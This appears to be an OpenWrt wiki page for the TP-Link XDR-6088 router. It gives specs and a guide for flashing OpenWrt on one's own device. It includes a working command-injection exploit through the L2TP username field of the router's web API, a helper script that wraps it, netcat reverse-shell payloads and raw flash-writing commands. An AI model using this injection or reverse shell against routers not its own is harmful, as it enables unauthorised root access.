TP-Link XDR-6088

The TP-Link XDR-6088 router supports four 802.11ax streams on each band (2.4 GHz at 40 MHz and 5 GHz at 160 MHz), for a combined 6000 Mbps wireless speed. It is based on the MediaTek MT7986A SoC.


CPU MT7986A @ 2.0 GHz
RAM 512 MiB
Flash 128 MiB
Network 4x 1G, 2x 2.5G
WLAN 2.4G b/g/n/ax
WLAN 5G a/n/ac/ax
USB 1x 3.0
Serial Yes
JTAG ?

Because TP-Link has locked down the stock bootloader significantly, it has to be replaced with OpenWrt's own bootloader (TF-A + U-Boot) to get OpenWrt running on the device. The procedure preserves the OEM ART (radio calibration) partition and the factory_boot partition that holds the device's MAC address.

The installation procedure is the same as for the TP-Link XDR-6086; see also the forum thread https://forum.openwrt.org/t/adding-support-for-tp-link-xdr-6086

Thanks to a root exploit found by @JamesLucas, this can be done without opening the device.

Optional Requirements:

  • A FAT32-formatted USB stick is strongly recommended: the BusyBox build in the stock firmware is very limited, so a full netcat is installed from the stick. This guide uses the stick to root the device and get a somewhat interactive shell.

To root the device, log into the router's web GUI and open the browser's developer tools (network inspector). The authentication token stok appears in the request URLs, which look like http://192.168.1.1/stok=<your token>/ds.

Next, navigate to the VPN tab and create an L2TP server. Disable encryption to make setup quicker. The settings do not matter as long as they are valid enough to create a dummy server.

On your PC, curl can be used to speed up the process. The skeleton command looks like this:

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";<command>","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Replace <command> with the shell command you want to run and <stok> with the token taken from the web inspector. The command is injected through the username field: the leading semicolon terminates whatever command the firmware builds around the username, and everything after it runs as root.

Download the netcat .ipk package onto the FAT32-formatted USB stick and plug the stick into the router. The first time it is plugged in it appears as /dev/sda1; the device letter increments (sdb1, sdc1, ...) each time the stick is unplugged and replugged, until the router reboots.

NOTE: Each of the following commands creates a new user on the L2TP server. The shell injection is triggered when that user is disabled. To run the next command, delete the previous L2TP user first. This could probably be done with a curl command too; feel free to update the page.

NOTE: For commands that produce output, a netcat listener on your PC (nc -nlvp 4444) can be used to receive it and verify that the step succeeded.
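The following helper wraps the skeleton request so that each of the steps below becomes one call. It is an added example, not code from this wiki page or from @JamesLucas. The router address 192.168.1.1 and the JSON fields are those of the skeleton above; the STOK placeholder, the DRY_RUN switch and the function names are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the OpenWrt wiki page): wrap the L2TP-user
# command-injection request in a function so each step is one call.
# Assumptions: router at $ROUTER, token in $STOK (placeholder by default).

ROUTER="${ROUTER:-192.168.1.1}"
STOK="${STOK:-REPLACE_WITH_STOK}"

# Build the JSON body of the "add L2TP user" call. The username field
# carries the injected command, prefixed with ';' and backgrounded with '&'
# exactly as in the skeleton on the page. Backslashes and double quotes in
# the command are escaped so the JSON stays valid; the command itself is
# still interpreted by the router's shell, so quote for that shell.
build_payload() {
    cmd="$1"
    esc=$(printf '%s' "$cmd" | sed 's/\\/\\\\/g; s/"/\\"/g')
    printf '{"vpn":{"table":"user","para":{"username":";%s &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' "$esc"
}

# Send the request. With DRY_RUN set, only print the URL and body that
# would be sent (useful to eyeball the escaping before touching the router).
inject() {
    payload=$(build_payload "$1")
    if [ -n "$DRY_RUN" ]; then
        printf 'POST http://%s/stok=%s/ds\n%s\n' "$ROUTER" "$STOK" "$payload"
        return 0
    fi
    curl -s -H "Content-Type: application/json" -X POST -d "$payload" \
        "http://$ROUTER/stok=$STOK/ds"
}
```

Usage: export STOK with your token, start nc -nlvp 4444 on the PC, then run for example inject 'ls -la /tmp | nc 192.168.1.100 4444'. The L2TP user still has to be disabled (to trigger) and deleted (before the next command) in the web GUI, as the notes above describe.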

Mounting the USB Stick

Create mount point:

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";mkdir /tmp/usb &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Check that the mount point exists (start the netcat listener on port 4444 on your PC first, and replace 192.168.1.100 with your PC's IP):

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";ls -la /tmp | nc 192.168.1.100 4444 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

If successful, you should see a directory usb has been created.

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Mount the USB stick:

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";mount -t vfat /dev/sda1 /tmp/usb &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Check that it mounted; the listing should show the netcat .ipk if it worked:

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";ls -la /tmp/usb | nc 192.168.1.100 4444 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Install netcat

Install netcat (make sure the file name matches your .ipk):

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";opkg install /tmp/usb/netcat.ipk &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Get a root shell

Now get a root shell (the netcat listener on your PC must be running for this):

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";netcat -e /bin/sh 192.168.1.100 4444 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

1. Run the steps above to open the netcat root shell.

2. Replace the stock bootloader with OpenWrt's. Copy the two images to /tmp on the router first (for example via the USB stick mounted at /tmp/usb), and check with cat /proc/mtd that mtd9 is the stock bootloader partition on your unit before writing; dd to the wrong mtdblock cannot be undone over the network. bs=131072 matches the 128 KiB erase-block size of the flash, so each write replaces whole erase blocks, and conv=sync pads the last block:

dd bs=131072 conv=sync of=/dev/mtdblock9 if=/tmp/openwrt-mediatek-filogic-tplink_tl-xdr6088-preloader.bin

dd bs=131072 conv=sync of=/dev/mtdblock9 seek=28 if=/tmp/openwrt-mediatek-filogic-tplink_tl-xdr6088-bl31-uboot.fip

3. Connect your PC to one of the router's Gigabit ports and set a static IP on the PC's Ethernet interface, e.g. 192.168.1.254 with gateway 192.168.1.1.

4. Download the initramfs image and serve it from a TFTP server on the PC (the new bootloader fetches it from 192.168.1.254), then restart the router and wait for the TFTP recovery to complete.

5. After OpenWrt boots, perform a sysupgrade with the sysupgrade image.
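A guard for step 2 above, added here as an example (it is not from the wiki page or the OpenWrt project): inside the netcat root shell it checks that the partition index and the image sizes agree with the layout the page's dd commands assume, keeps a copy of the stock bootloader, and only then runs the same two dd commands. The sample /proc/mtd text in the block is constructed for illustration and does not describe the XDR-6088's real partition table; the partition name "u-boot" in it and the backup path under /tmp are assumptions.

```shell
#!/bin/sh
# Added example, not code from the OpenWrt wiki page: wrap the two dd writes
# from the page in checks that catch the common ways of bricking the device.
# Meant to run in the netcat root shell on the router (BusyBox ash).
# Assumptions: the partition name you look up and the backup path are yours
# to confirm; BS and FIP_SEEK come from the page's dd commands.

BS=131072        # erase-block size the page writes with (bs=131072)
FIP_SEEK=28      # the FIP is written at block 28 = byte offset 3670016

# Constructed sample of /proc/mtd for testing the parsers below; it is NOT
# the XDR-6088's real layout, and the name "u-boot" is an assumption.
SAMPLE_PROC_MTD='dev:    size   erasesize  name
mtd0: 00100000 00020000 "BL2"
mtd9: 00400000 00020000 "u-boot"'

# Print the index N of the /proc/mtd entry named exactly $2, given the
# /proc/mtd text in $1. Prints nothing and returns 1 if there is no match.
find_mtd_index() {
    idx=$(printf '%s\n' "$1" |
        sed -n "s/^mtd\([0-9][0-9]*\): [0-9a-f]* [0-9a-f]* \"$2\"\$/\1/p")
    [ -n "$idx" ] || return 1
    printf '%s\n' "$idx"
}

# Print the size in bytes of mtd$2, given /proc/mtd text in $1 (sizes are hex).
mtd_size_bytes() {
    hex=$(printf '%s\n' "$1" | sed -n "s/^mtd$2: \([0-9a-f]*\) .*/\1/p")
    [ -n "$hex" ] || return 1
    printf '%s\n' "$((0x$hex))"
}

# The page's layout: preloader at offset 0, FIP at block FIP_SEEK. The
# preloader must end before block FIP_SEEK (otherwise the FIP write clobbers
# its tail) and the FIP must end inside the partition.
# $1 = partition size, $2 = preloader size, $3 = FIP size (all in bytes).
layout_ok() {
    part_bytes=$1; pre_bytes=$2; fip_bytes=$3
    [ "$pre_bytes" -gt 0 ] && [ "$fip_bytes" -gt 0 ] || return 1
    [ "$pre_bytes" -le $((FIP_SEEK * BS)) ] || return 1
    [ $((FIP_SEEK * BS + fip_bytes)) -le "$part_bytes" ] || return 1
}

# Check, back up, then write exactly as the page does.
# $1 = mtd index (9 on the page), $2 = preloader image, $3 = bl31-uboot FIP.
flash_bootloader() {
    idx=$1; pre=$2; fip=$3
    [ -r "$pre" ] && [ -r "$fip" ] || { echo "image file missing" >&2; return 1; }
    mtd_text=$(cat /proc/mtd) || return 1
    part=$(mtd_size_bytes "$mtd_text" "$idx") || { echo "mtd$idx not found" >&2; return 1; }
    pre_size=$(( $(wc -c < "$pre") )); fip_size=$(( $(wc -c < "$fip") ))
    layout_ok "$part" "$pre_size" "$fip_size" || { echo "images do not fit mtd$idx" >&2; return 1; }
    # Keep a copy of the stock bootloader; pull it off with nc before rebooting.
    dd if="/dev/mtdblock$idx" of="/tmp/mtd$idx.stock.bin" bs=$BS || return 1
    dd bs=$BS conv=sync of="/dev/mtdblock$idx" if="$pre" || return 1
    dd bs=$BS conv=sync of="/dev/mtdblock$idx" seek=$FIP_SEEK if="$fip" || return 1
}
```

Usage on the router: confirm the index with find_mtd_index "$(cat /proc/mtd)" <name of the bootloader partition on your unit>, then run flash_bootloader 9 /tmp/openwrt-mediatek-filogic-tplink_tl-xdr6088-preloader.bin /tmp/openwrt-mediatek-filogic-tplink_tl-xdr6088-bl31-uboot.fip and copy /tmp/mtd9.stock.bin to the PC with nc before rebooting.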

Architecture ARM
Vendor MediaTek
Bootloader TF-A + U-Boot
System-On-Chip MT7986
CPU/Speed 2.0 GHz
Flash-Chip ?
Flash size 128 MiB
RAM 512 MiB
Wireless MT7986GN 2.4GHz 802.11bgnax
Ethernet 10/100/1000/2500 Mbit/s w/ vlan support
Switch MediaTek MT7531A
USB 1x 3.0
Serial Yes
JTAG Unknown

See the complete teardown (in Chinese): https://www.acwifi.net/20864.html

  • Last modified: 2025/02/21 09:47
  • by humaita